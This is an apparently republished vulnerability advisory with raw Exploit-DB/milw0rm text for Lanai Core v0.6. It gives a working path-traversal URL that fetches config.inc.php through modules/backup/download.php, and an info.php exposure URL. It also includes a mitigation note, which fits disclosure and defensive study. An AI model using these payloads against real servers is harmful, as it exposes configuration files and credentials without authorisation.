Lanai Core v 0.6 Remote File Disclosure / IG

vendor:

Lanai Core

by:

Sina Yazdanmehr (R3d.W0rm)

7,5

CVSS

HIGH

Remote File Disclosure

200

CWE

Product Name: Lanai Core

Affected Version From: 0.6

Affected Version To: 0.6

Patch Exists: Yes

Related CWE: N/A

CPE: a:lanai_core:lanai_core:0.6

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Lanai Core v 0.6 Remote File Disclosure / IG

A vulnerability in Lanai Core v 0.6 allows an attacker to remotely disclose files on the server. This is done by sending a specially crafted HTTP request to the download.php script in the modules/backup directory, with the parameter ‘f’ set to ‘../config.inc.php’. This will cause the contents of the config.inc.php file to be sent to the attacker.

Mitigation:

Upgrade to the latest version of Lanai Core.

Source

Exploit-DB raw data:

#####################################################################################
####              Lanai Core v 0.6  Remote File Disclosure / IG                  ####
#####################################################################################
#                                                                                   #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
#Our Site : http://IrCrash.com                                                      #
#My Official WebSite : http://R3dW0rm.ir                                            #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr)            #
#####################################################################################
#                                                                                   #
#Download : http://garr.dl.sourceforge.net/project/lanai/Lanai%20Core/Core%206/lanai-core_v0.6.zip
#                                                                                   #
#####################################################################################
#                                      [IG]                                         #
#                                                                                   #                                       
#http://[site]/[path]/info.php                                                      #
#                                                                                   #
#####################################################################################
#                            [Remote File Disclosure]                               #
#                                                                                   #
#http://[site]/[path]/modules/backup/download.php?f=../config.inc.php               #
#                                                                                   #
###################################### TNX GOD ######################################

# milw0rm.com [2009-08-24]